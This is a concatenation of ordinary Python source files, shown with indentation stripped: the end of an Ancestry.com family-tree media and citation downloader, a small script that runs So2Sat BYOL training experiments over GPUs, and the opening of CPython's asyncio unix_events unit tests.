title_section = soup.find(id="recordIndexPageTitle")
if title_section is None:
title_section = soup.find(class_="collectionTitle")
if title_section is not None:
page_title = title_section.text.replace("\n\nfor", "").strip()
subtitle_section = soup.find(class_="pageIntro")
if subtitle_section is not None:
subtitle_entry = subtitle_section.find("a")
if subtitle_entry is not None:
db_title = subtitle_entry.text.strip()
dbid_data.update({"title": db_title})
apid_data.update(
{"title": "{0} in the {1}".format(page_title, db_title)}
)
else:
subtitle_section = None
if subtitle_section is None:
dbid_data.update({"title": page_title})
apid_data.update({"title": page_title})
person_section = soup.find(class_="personRecordSavedToText")
if person_section is not None:
person_entry = person_section.find("a")
if person_entry is not None:
apid_data.update(
{"person_name": person_entry.text, "person_url": person_entry["href"]}
)
session.tree_id = person_entry["href"].split("tid=").pop(1)
tree_record = soup.find(class_="tree_recordSavedTo")
if tree_record is not None:
session.tree_name = tree_record.text.strip('"')
record_section = soup.find(id="recordData")
if record_section is not None:
facts = {}
for row in record_section.find_all("tr"):
table_th = row.find("th", string=True)
if table_th is not None:
key = table_th.string.strip(" :\n")
table_td = row.find("td", string=True)
if table_td is not None:
value = table_td.text.replace("\u00a0", " ").strip(" \n")
if (
"#viewNeighbors" in value
or "#mapWrapper" in value
or "Search for" in value
):
continue
value = (
value.replace("\n\n", "; ").replace(" ;", " ").replace("\n", " ")
)
while " " in value:
value = value.replace(" ", " ")
value = value.replace("Name Age; ", "")
if key.lower() == "url":
value = table_td.find(class_="link")["href"]
facts.update({key: value})
if facts != {}:
apid_data.update({"facts": facts})
citation_section = soup.find(id="sourceCitation")
if citation_section is not None:
for citation in citation_section.find_all(class_="citationCon"):
section_title = citation.find(class_="citationTitle")
if section_title is not None:
section_title = section_title.text.strip(" ").lower().replace(" ", "_")
section_text = citation.find(class_="sourceText")
if section_text is not None:
data = section_text.text.strip(" \n").replace(" Learn more...", "")
data = (
data.replace(".\n ", "; ")
.replace("\u2019", "'")
.replace("\n", " ")
)
while " " in data:
data = data.replace(" ", " ")
if section_title == "source_information":
dbid_data.update(
{
"publisher": data.split("Original data:")
.pop(0)
.strip(" ;,")
}
)
if "Original data:" in data:
dbid_data.update(
{
"original": data.split("Original data:")
.pop(1)
.strip(" ;,")
}
)
elif section_title == "description":
dbid_data.update({"description": data})
elif section_title == "source_citation":
apid_data.update({"citation": data})
if session.options.screenshots and source_type != "rawimage":
screenshot_file = "{0}/media/apid/apid_{1}_{2}_{3}.png".format(
session.options.output, indiv, dbid, dbrecord
)
get_screenshot(session, screenshot_file)
apid_data.update({"screenshot": screenshot_file})
if source_type in ["image", "rawimage"]:
file_name = file_hash = ""
if source_type == "image":
image_link = soup.find(class_="photo", href=True)["href"]
else:
image_link = session.current_url
logging.debug("Image link: %s", image_link)
if "ancestry.com/imageviewer" in image_link:
image_id = image_link.split("?").pop(0).split("/").pop(-1)
unique_id = dbid + "_" + image_id
if unique_id in session.images:
logging.info("Image already downloaded")
for file_hash in session.hash_map:
if image_id in session.hash_map[file_hash]:
file_name = session.hash_map[file_hash]
break
if file_name == "":
file_name = session.images[unique_id]
hash_data = hashlib.sha256()
with open(file_name, "rb") as image_file:
file_data = image_file.read()
hash_data.update(file_data)
file_hash = hash_data.hexdigest()
session.hash_map.update({file_hash: file_name})
else:
logging.info("Getting image meta data")
image_dir = "{0}/media/dbid/{1}".format(session.options.output, dbid)
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
image_file = "{0}/{1}".format(image_dir, image_id)
image_meta_link = (
"https://www.ancestry.com/imageviewer/api/media/token?"
+ "dbId={0}&imageId={1}".format(dbid, image_id)
)
logging.debug("Image metadata link: %s", image_meta_link)
session.get(image_meta_link)
result = wait_for_text(session, "imageDownloadUrl", 10)
if result != "ready":
logging.error("Page unavailable or timeout loading image metadata")
return result
download_url = ""
try:
soup = BeautifulSoup(session.page_source, features="lxml")
image_meta_data = json.loads(soup.find(id="json").string)
download_url = image_meta_data["imageDownloadUrl"]
except Exception:
logging.debug(session.page_source)
if download_url in [None, ""]:
logging.error("Unable to find image download URL")
return "timeout"
logging.debug("Image download url: %s", download_url)
file_name, file_hash, duplicate = get_image(
session, download_url, image_file
)
if file_name:
session.images.update({unique_id: file_name})
if file_name != "":
apid_data.update({"image": file_name, "hash": file_hash})
with open(apid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(apid_data))
meta_file.flush()
dbid_meta_file = "{0}/metadata/dbid/{1}.toml".format(session.options.output, dbid)
if not os.path.isfile(dbid_meta_file):
if "publisher" not in dbid_data:
db_page = "https://www.ancestry.com/search/collections/{0}".format(dbid)
logging.info("Fetching database search page at %s", db_page)
session.get("https://www.ancestry.com/search/collections/{0}".format(dbid))
result = wait_for_text(session, "sourceInformation", 10)
if result == "ready":
logging.info("Checking for database publisher information")
soup = BeautifulSoup(session.page_source, features="lxml")
source_information = soup.find(id="sourceInformation")
data = source_information.find(class_="conBody")
data = data.text.strip(" \n").replace(" Learn more...", "")
data = (
data.replace(".\n ", "; ").replace("\u2019", "'").replace("\n", " ")
)
while " " in data:
data = data.replace(" ", " ")
dbid_data.update(
{"publisher": data.split("Original data:").pop(0).strip(" ;,")}
)
if "Original data:" in data:
dbid_data.update(
{"original": data.split("Original data:").pop(1).strip(" ;,")}
)
with open(dbid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(dbid_data))
meta_file.flush()
item_process_time = pendulum.now() - item_start_time
logging.info("Item processing time %d seconds", item_process_time.seconds)
return "success"
def get_newspaper_clipping(session, url):
"""
Download newspapers.com clippings as pdfs with source info
(the default images of these clippings are low quality but anyone can download higher quality clippings without a login)
Download format
https://www.newspapers.com/clippings/download/?id=55922467
Note format from GEDCOM (This is what the script looks for)
https://www.newspapers.com/clip/55922467/shareholders-meeting/
"""
if not session.options.newspapers:
return {}
cid = url.split("/").pop(4)
base_name = "newspapers_com--{0}--{1}".format(url.split("/").pop(5), cid)
dl_url = "https://www.newspapers.com/clippings/download/?id={}".format(cid)
logging.info(
"Fetching Newspapers.com clipping: {0} at {1}".format(
url.split("/").pop(5), dl_url
)
)
image_dir = "{0}/media/{1}".format(session.options.output, "clippings")
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
image_name = "{0}/{1}".format(image_dir, base_name)
file_name, file_hash, duplicate = get_image(session, dl_url, image_name)
if not duplicate and file_name:
return {"clipping": file_name, "clip_hash": file_hash}
return {}
def check_url_note(url, metadata):
"""
Checks the url note for urls that can be processed for additional files
Initially this is just newspaper.com clippings.
Returns True if the url needs to be processed, false if it doesn't
"""
# The check value and the toml value
check_dict = {"https://www.newspapers.com/clip/": "clipping"}
for check_value in check_dict:
if check_value in url:
if check_dict[check_value] in metadata:
if not os.path.isfile(metadata[check_dict[check_value]]):
return True
else:
continue
else:
return True
return False
def process_url_note(session, url):
"""
Processes a url note, downloads any additional files and returns a dict to update the metadata guid
"""
# Dict contains a simple lookup string and the corrisponding function if it is found
check_dict = {
"https://www.newspapers.com/clip/": {"function": get_newspaper_clipping}
}
result = ""
for check_value in check_dict:
if check_value in url:
# Can only match one of the check_dict options so it returns after the first match
result = check_dict[check_value]["function"](session, url)
if result:
return result
return {}
def get_user_media(session, line, url_note):
"""
Process a user contributed media item uniquely identified by the GUID
"""
url = line.split(" ").pop(2).strip()
guid = url.split("&").pop(1)[5:]
guid_meta_file = "{0}/metadata/guid/{1}.toml".format(session.options.output, guid)
if os.path.isfile(guid_meta_file):
process_data = False
try:
with open(guid_meta_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "image" in metadata:
if not os.path.isfile(metadata["image"]):
process_data = True
if check_url_note(url_note, metadata):
process_data = True
except Exception as e:
process_data = True
if not process_data:
if session.line_number > session.checkpoint:
logging.debug("GUID indicates user media item already downloaded")
return "duplicate"
logging.info("GUID previously processed but image missing so reprocessing")
if guid in session.unavailable:
if session.line_number > session.checkpoint:
logging.debug(
"GUID indicates user media item duplicate of unavailable item"
)
return "skip"
item_start_time = pendulum.now()
logging.info("Fetching user media item page at %s", url)
session.get(url)
result = wait_for_text(session, "showOriginalLink", 10)
if result != "ready":
if result == "unavailable":
session.unavailable = session.unavailable + [guid]
return result
soup = BeautifulSoup(session.page_source, features="lxml")
image_link = soup.find(id="showOriginalLink")["href"]
logging.info("Extracting metadata for the user media")
edit_object = session.find_element_by_id("editObjectLink")
edit_object.click()
result = wait_for_text(session, "PictureType", 10)
if result != "ready":
logging.error("Page unavailable or timed out loading")
return result
soup = BeautifulSoup(session.page_source, features="lxml")
guid_data = {
"guid": guid,
"url": url,
"type": soup.find(id="PictureType").find(selected="true")["value"],
"title": soup.find(id="MediaName")["value"],
}
facts = {
"description": soup.find(id="Description").text,
"location": soup.find(id="Location")["value"],
"date": soup.find(id="Date")["value"],
}
if guid_data["type"] == "document":
facts.update({"transcription": soup.find(id="DocumentTranscription").text})
if guid_data["type"] == "headstone":
facts.update(
{
"headstone_name": soup.find(id="HeadstoneName")["value"],
"headstone_birth_year": soup.find(id="Text2")["value"],
"headstone_birth_location": soup.find(id="Text3")["value"],
"headstone_death_year": soup.find(id="Text4")["value"],
"headstone_death_location": soup.find(id="Text5")["value"],
"headstone_cemetery_name": soup.find(id="HeadstoneCemeteryName")[
"value"
],
}
)
guid_data.update({"facts": facts})
base_name = guid_data["title"].lower()
if base_name in ["", None]:
base_name = "untitled"
for remove_character in [",", "-", '"', "'", "&", ".", "(", ")", "[", "]"]:
base_name = base_name.replace(remove_character, "")
base_name = base_name.replace(" ", "_")
while "__" in base_name:
base_name = base_name.replace("__", "_")
image_dir = "{0}/media/{1}".format(session.options.output, guid_data["type"])
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
image_name = "{0}/{1}".format(image_dir, base_name)
file_name, file_hash, duplicate = get_image(session, image_link, image_name)
if file_name:
guid_data.update({"image": file_name, "hash": file_hash})
guid_data.update(process_url_note(session, url_note))
with open(guid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(guid_data))
meta_file.flush()
item_process_time = pendulum.now() - item_start_time
logging.info("Item processing time %d seconds", item_process_time.seconds)
if duplicate:
return "duplicate"
return "success"
return "unavailable"
def main():
"""
Main program
"""
for signal_type in [SIGTERM, SIGABRT]:
signal(signal_type, clean_exit)
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--account", help="Account name")
parser.add_argument("-c", "--config", help="Configuration file")
parser.add_argument(
"-C",
"--citations",
default=True,
action="store_true",
help="Save source images for citations",
)
parser.add_argument(
"-g",
"--gedcom",
help="Gedcom file",
)
parser.add_argument(
"-i",
"--ignore",
default=False,
action="store_true",
help="Ignore previously unavailable APID entries",
)
parser.add_argument(
"-M",
"--media",
default=True,
action="store_true",
help="Save user media images",
)
parser.add_argument(
"-N",
"--newspapers",
default=False,
action="store_true",
help="Save clipped newspaper images",
)
parser.add_argument("-o", "--output", help="Root of output directory structure")
parser.add_argument("-p", "--password", help="Password")
parser.add_argument(
"-r",
"--resume",
default=False,
action="store_true",
help="Resume if prior state found",
)
parser.add_argument(
"-S",
"--screenshots",
default=False,
action="store_true",
help="Save source citation screenshots",
)
parser.add_argument(
"-u",
"--url",
dest="ancestry",
default="https://www.ancestry.com",
help="Override default https://www.ancestry.com",
)
args = parser.parse_args()
if not args.account or not args.password or not args.gedcom:
if not args.config:
args.config = "ancestry_extract.toml"
if args.config:
if os.path.isfile(args.config):
with open(args.config, "r") as config_file:
config_data = toml.load(config_file)
for key in config_data:
setattr(args, key, config_data[key])
if not args.account or not args.password or not args.gedcom:
print("Account name, password, and gedcom file are required arguments")
sys.exit(1)
if not os.path.isfile(args.gedcom):
print("Gedcom file not found")
sys.exit(1)
with open(args.gedcom, "r") as gedcom:
gedcom_data = gedcom.read()
if (
"1 SOUR Ancestry.com Family Trees" not in gedcom_data
or "2 CORP Ancestry.com" not in gedcom_data
):
print("Gedcom file does not appear to be from Ancestry.com")
sys.exit(1)
for check_dir in [
"/logs",
"/media/dbid",
"/media/apid",
"/metadata/guid",
"/metadata/apid",
"/metadata/dbid",
]:
if not os.path.isdir(args.output + check_dir):
os.makedirs(args.output + check_dir)
log_file = (
args.output
+ "/logs/"
+ pendulum.now().format("YYYY-MM-DD-HH-MM")
+ "-ancestry-extract.log"
)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(name)-8s %(levelname)-8s %(message)s",
filename=log_file,
filemode="a",
)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(message)s")
console.setFormatter(formatter)
logging.getLogger("").addHandler(console)
if args.config:
logging.info("Config File: " + args.config)
logging.info("Gedcom File: " + args.gedcom)
logging.info("Output Tree: " + args.output)
logging.info("Save Citation Images: " + str(args.citations))
logging.info("Save Citation Screenshots: " + str(args.screenshots))
logging.info("Save User Media: " + str(args.media))
logging.info("Save News Clippings: " + str(args.newspapers))
gedcom_queue = Queue()
gedcom_process = Process(target=load_gedcom, args=(gedcom_queue, gedcom_data))
gedcom_process.start()
cache_queue = Queue()
cache_process = Process(target=load_tables, args=(cache_queue, args.output))
cache_process.start()
logging.info("Launching browser")
firefox_profile = FirefoxProfile()
firefox_profile.set_preference("browser.startup.homepage", "about:blank")
firefox_profile.set_preference("browser.download.folderList", 2)
firefox_profile.set_preference("browser.download.panel.shown", False)
firefox_profile.set_preference("browser.download.manager.showWhenStarting", False)
firefox_profile.set_preference("browser.download.dir", args.output)
firefox_profile.set_preference(
"browser.helperApps.neverAsk.saveToDisk", "application/octet-stream"
)
firefox_profile.set_preference("places.history.enabled", False)
firefox_options = Options()
firefox_options.headless = True
session = Firefox(options=firefox_options, firefox_profile=firefox_profile)
atexit.register(session_cleanup, session)
session.implicitly_wait(15)
session.fullscreen_window()
session.options = args
login(session)
result = cache_queue.get()
session.checkpoint = result["checkpoint"]
session.tree_id = result["tree_id"]
session.tree_name = result["tree_name"]
session.unavailable = []
if args.resume or args.ignore:
session.unavailable = result["unavailable"]
session.hash_map = result["hash_map"]
session.images = result["image_cache"]
cache_process.join()
result = gedcom_queue.get()
people = result["people"]
people_total = len(people)
family_total = result["families"]
apid_total = result["apid_total"]
apid_unique = result["apid_unique"]
guid_total = result["guid_total"]
guid_unique = result["guid_unique"]
gedcom_process.join()
logging.info(
"Found %d people and %d families to process", people_total, family_total
)
logging.info(
"Found %d unique and %d total ancestry citations to process",
apid_unique,
apid_total,
)
logging.info(
"Found %d unique and %d total user media items to process",
guid_unique,
guid_total,
)
print_flag = False
session.line_number = 0
success = unavailable = duplicate = skip = timeouts = total = count = 0
person_number = family_number = 0
apid_number = guid_number = 0
person = husband = wife = ""
url_note = ""
logging.info("Starting second pass Gedcom processing")
for line in gedcom_data.split("\n"):
session.line_number = session.line_number + 1
if args.resume and session.line_number < session.checkpoint:
continue
args.resume = False
if len(line) < 5:
continue
if line[0] == 1:
# reset the url note for new records
url_note = ""
tag = line.split(" ")[1]
if tag == "SOUR":
if session.line_number > session.checkpoint:
session.checkpoint = session.line_number
continue
if "@P" in tag:
person_number = person_number + 1
husband = wife = ""
person = people[tag]
print_flag = False
continue
if "@F" in tag:
family_number = family_number + 1
husband = wife = person = ""
print_flag = False
continue
if tag == "HUSB":
husband = people[line[7:]]
continue
if tag == "WIFE":
wife = people[line[7:]]
continue
if tag == "NOTE":
if "http" in line:
url_note = line[7:]
continue
if tag in ["FILE", "_APID"]:
total = total + 1
if not print_flag:
if session.line_number > session.checkpoint:
if person:
logging.info(
"Processing records for person %s (%d of %d)",
person,
person_number,
people_total,
)
else:
who = join = ""
if husband != "":
who = husband
join = " and "
if wife != "":
who = who + join + wife
logging.info(
"Processing records for family of %s (%d of %d)",
who,
family_number,
family_total,
)
print_flag = True
if args.media and " FILE " in line and "f=image&guid=" in line:
guid_number = guid_number + 1
logging.debug(
"User media item %d of %d with %d unique",
guid_number,
guid_total,
guid_unique,
)
result = get_user_media(session, line, url_note)
url_note = ""
if args.citations and " _APID " in line:
process_apid = True
if args.ignore:
apid = line.split(" ").pop(2).strip()
if apid in session.unavailable:
process_apid = False
result = "unavailable"
if process_apid:
apid_number = apid_number + 1
if "::0" not in line:
logging.debug(
"Source citation media item %d of %d with %d unique",
apid_number,
apid_total,
apid_unique,
)
result = get_citation_media(session, line)
if result == "success":
count = count + 1
success = success + 1
elif result == "duplicate":
duplicate = duplicate + 1
elif result == "unavailable":
if person:
logging.info("Unavailable item for %s", person)
else:
logging.info("Unavailable item for %s / %s", husband, wife)
unavailable = unavailable + 1
elif result == "timeout":
timeouts = timeouts + 1
elif result == "skip":
skip = skip + 1
logging.info("Total overall records: %d", total)
logging.info("Total processed records: %d", success)
logging.info("Total duplicate records: %d", duplicate)
logging.info("Total unavailable records: %d", unavailable)
logging.info("Total skipped due to unavailable: %d", skip)
logging.info("Total skipped due to timeouts: %d", timeouts)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
logging.info("Starting application shutdown")
sys.exit(1)
sys.exit(0)
|
run_so2sat_byol_experiments.py
|
#!/usr/bin/env python3
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Runs the train script with a grid of hyperparameters."""
import itertools
import os
import subprocess
from multiprocessing import Process, Queue
from typing import List
# list of GPU IDs that we want to use, one job will be started for every ID in the list
GPUS = [0, 1, 2, 3, 3]
DRY_RUN = False # if False then print out the commands to be run, if True then run
DATA_DIR = "" # path to the So2Sat data directory
# Hyperparameter options
model_options = ["resnet50"]
lr_options = [1e-4]
loss_options = ["ce"]
weight_options: List[str] = [] # set paths to checkpoint files
bands_options = ["s2"]
def do_work(work: "Queue[str]", gpu_idx: int) -> bool:
"""Process for each ID in GPUS."""
while not work.empty():
experiment = work.get()
experiment = experiment.replace("GPU", str(gpu_idx))
print(experiment)
if not DRY_RUN:
subprocess.call(experiment.split(" "))
return True
if __name__ == "__main__":
work: "Queue[str]" = Queue()
for (model, lr, loss, weights, bands) in itertools.product(
model_options, lr_options, loss_options, weight_options, bands_options
):
experiment_name = f"{model}_{lr}_{loss}_byol_{bands}-{weights.split('/')[-2]}"
output_dir = os.path.join("output", "so2sat_experiments")
log_dir = os.path.join(output_dir, "logs")
config_file = os.path.join("conf", "so2sat.yaml")
if not os.path.exists(os.path.join(output_dir, experiment_name)):
command = (
"python train.py"
+ f" config_file={config_file}"
+ f" experiment.name={experiment_name}"
+ f" experiment.module.classification_model={model}"
+ f" experiment.module.learning_rate={lr}"
+ f" experiment.module.loss={loss}"
+ f" experiment.module.weights={weights}"
+ " experiment.module.in_channels=10"
+ f" experiment.datamodule.bands={bands}"
+ f" program.output_dir={output_dir}"
+ f" program.log_dir={log_dir}"
+ f" program.data_dir={DATA_DIR}"
+ " trainer.gpus=[GPU]"
)
command = command.strip()
work.put(command)
processes = []
for gpu_idx in GPUS:
p = Process(target=do_work, args=(work, gpu_idx))
processes.append(p)
p.start()
for p in processes:
p.join()
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import base_events
from asyncio import events
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def tearDownModule():
asyncio.set_event_loop_policy(None)
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
m_signal.valid_signals = signal.valid_signals
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
coro = self.loop.create_unix_connection(lambda: None, path)
with self.assertRaises(FileNotFoundError):
# If pathlib.Path wasn't supported, the exception would be
# different.
self.loop.run_until_complete(coro)
def test_create_unix_server_existing_path_nonsock(self):
with tempfile.NamedTemporaryFile() as file:
coro = self.loop.create_unix_server(lambda: None, file.name)
with self.assertRaisesRegex(OSError,
'Address.*is already in use'):
self.loop.run_until_complete(coro)
def test_create_unix_server_ssl_bool(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl=True)
with self.assertRaisesRegex(TypeError,
'ssl argument must be an SSLContext'):
self.loop.run_until_complete(coro)
def test_create_unix_server_nopath_nosock(self):
coro = self.loop.create_unix_server(lambda: None, path=None)
with self.assertRaisesRegex(ValueError,
'path was not specified, and no sock'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
def test_create_unix_server_path_dgram(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
@support.skip_unless_bind_unix_socket
def test_create_unix_server_path_stream_bittype(self):
sock = socket.socket(
socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with tempfile.NamedTemporaryFile() as file:
fn = file.name
try:
with sock:
sock.bind(fn)
coro = self.loop.create_unix_server(lambda: None, path=None,
sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
finally:
os.unlink(fn)
def test_create_unix_server_ssl_timeout_with_plain_sock(self):
coro = self.loop.create_unix_server(lambda: None, path='spam',
ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_unix_connection_path_inetsock(self):
sock = socket.socket()
with sock:
coro = self.loop.create_unix_connection(lambda: None,
sock=sock)
with self.assertRaisesRegex(ValueError,
'A UNIX Domain Stream.*was expected'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.unix_events.socket')
def test_create_unix_server_bind_error(self, m_socket):
# Ensure that the socket is closed on any bind error
sock = mock.Mock()
m_socket.socket.return_value = sock
sock.bind.side_effect = OSError
coro = self.loop.create_unix_server(lambda: None, path="/test")
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
sock.bind.side_effect = MemoryError
coro = self.loop.create_unix_server(lambda: None, path="/test")
